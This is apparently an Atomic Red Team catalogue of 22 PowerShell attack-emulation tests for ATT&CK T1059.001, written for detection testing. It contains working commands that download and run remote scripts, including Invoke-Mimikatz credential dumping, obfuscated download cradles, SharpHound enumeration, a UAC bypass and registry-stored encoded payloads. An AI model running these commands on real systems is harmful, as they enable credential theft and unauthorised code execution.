T1059.001
Command and Scripting Interpreter: PowerShell
Description from ATT&CK
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
Atomic Tests
Atomic Test #1 - Mimikatz
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
Supported Platforms: windows
auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
Atomic Test #2 - Run BloodHound from local disk
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
Supported Platforms: windows
auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
4
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
Cleanup Commands:
1
2
Remove-Item $env:Temp\*BloodHound.zip -Force
Dependencies: Run with powershell!
Description: SharpHound.ps1 must be located at "PathToAtomicsFolder..\ExternalPayloads\SharpHound.ps1"
Check Prereq Commands:
1
2
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
Atomic Test #3 - Run Bloodhound from Memory using Download Cradle
Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
Supported Platforms: windows
auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
4
5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
Cleanup Commands:
1
2
Remove-Item $env:Temp\*BloodHound.zip -Force
Atomic Test #4 - Obfuscation Tests
Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
Supported Platforms: windows
auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
4
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
Supported Platforms: windows
auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Atomic Test #6 - Invoke-AppPathBypass
Note: Windows 10 only. Upon execution windows backup and restore window will be opened.
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Supported Platforms: windows
auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372
Inputs:
None
Attack Commands: Run with command_prompt!
1
2
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
Atomic Test #7 - Powershell MsXml COM object - with prompt
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
Provided by https://github.com/mgreen27/mgreen27.github.io
Supported Platforms: windows
auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1 |
Attack Commands: Run with command_prompt!
1
2
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
Atomic Test #8 - Powershell XML requests
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
Provided by https://github.com/mgreen27/mgreen27.github.io
Supported Platforms: windows
auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml |
Attack Commands: Run with command_prompt!
1
2
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
Atomic Test #9 - Powershell invoke mshta.exe download
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
Supported Platforms: windows
auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct |
Attack Commands: Run with command_prompt!
1
2
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
Atomic Test #10 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
Supported Platforms: windows
auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
Inputs:
None
Run it with these steps!
- Open Powershell_ise as a Privileged Account
- Invoke-DownloadCradle.ps1
1
Atomic Test #11 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder.
Supported Platforms: windows
auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
4
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
Cleanup Commands:
1
2
3
Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
Atomic Test #12 - PowerShell Downgrade Attack
This test requires the manual installation of PowerShell V2.
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
Supported Platforms: windows
auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
Inputs:
None
Attack Commands: Run with powershell!
1
2
powershell.exe -version 2 -Command Write-Host $PSVersion
Dependencies: Run with powershell!
Description: PowerShell version 2 must be installed
Check Prereq Commands:
1
2
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
Write-Host Automated installer not implemented yet, please install PowerShell v2 manually
Atomic Test #13 - NTFS Alternate Data Stream Access
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
Supported Platforms: windows
auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| ads_file | File created to store Alternate Stream Data | string | $env:TEMP\NTFS_ADS.txt |
Attack Commands: Run with powershell!
1
2
3
4
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
Cleanup Commands:
1
2
Remove-Item #{ads_file} -Force -ErrorAction Ignore
Dependencies: Run with powershell!
Description: Homedrive must be an NTFS drive
Check Prereq Commands:
1
2
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
Write-Host Prereq's for this test cannot be met automatically
Atomic Test #14 - PowerShell Session Creation and Use
Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
Supported Platforms: windows
auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| hostname_to_connect | The host to connect to, by default it will connect to the local machine | string | $env:COMPUTERNAME |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Dependencies: Run with powershell!
Description: PSRemoting must be enabled
Check Prereq Commands:
1
2
3
4
5
6
7
8
Try {
New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null
exit 0
}
Catch {
exit 1
}
Get Prereq Commands:
1
2
Enable-PSRemoting
Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations
Executes powershell.exe with variations of the -Command parameter
Supported Platforms: windows
auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_line_switch_type | The type of supported command-line switch to use | string | Hyphen |
| command_param_variation | The "Command" parameter variation to use | string | C |
Attack Commands: Run with powershell!
1
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Dependencies: Run with powershell!
Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied
Supported Platforms: windows
auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_line_switch_type | The type of supported command-line switch to use | string | Hyphen |
| command_param_variation | The "Command" parameter variation to use | string | C |
| encoded_arguments_param_variation | The "EncodedArguments" parameter variation to use | string | EA |
Attack Commands: Run with powershell!
1
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Dependencies: Run with powershell!
Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
Executes powershell.exe with variations of the -EncodedCommand parameter
Supported Platforms: windows
auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_line_switch_type | The type of supported command-line switch to use | string | Hyphen |
| encoded_command_param_variation | The "EncodedCommand" parameter variation to use | string | E |
Attack Commands: Run with powershell!
1
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Dependencies: Run with powershell!
Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied
Supported Platforms: windows
auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| encoded_command_param_variation | The "EncodedCommand" parameter variation to use | string | E |
| command_line_switch_type | The type of supported command-line switch to use | string | Hyphen |
| encoded_arguments_param_variation | The "EncodedArguments" parameter variation to use | string | EncodedArguments |
Attack Commands: Run with powershell!
1
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Dependencies: Run with powershell!
Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Atomic Test #19 - PowerShell Command Execution
Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
Supported Platforms: windows
auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| obfuscated_code | Defaults to: Invoke-Expression with a "Write-Host" line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== |
Attack Commands: Run with command_prompt!
1
2
powershell.exe -e #{obfuscated_code}
Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets
Powershell execution of known Malicious PowerShell Cmdlets
Supported Platforms: windows
auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| Malicious_cmdlets | Known Malicious Cmdlets | string | "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
Atomic Test #21 - PowerUp Invoke-AllChecks
Check for privilege escalation paths using PowerUp from PowerShellMafia
Supported Platforms: windows
auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
4
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
Atomic Test #22 - Abuse Nslookup with DNS Records
Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts. reference
Supported Platforms: windows
auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
4
5
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]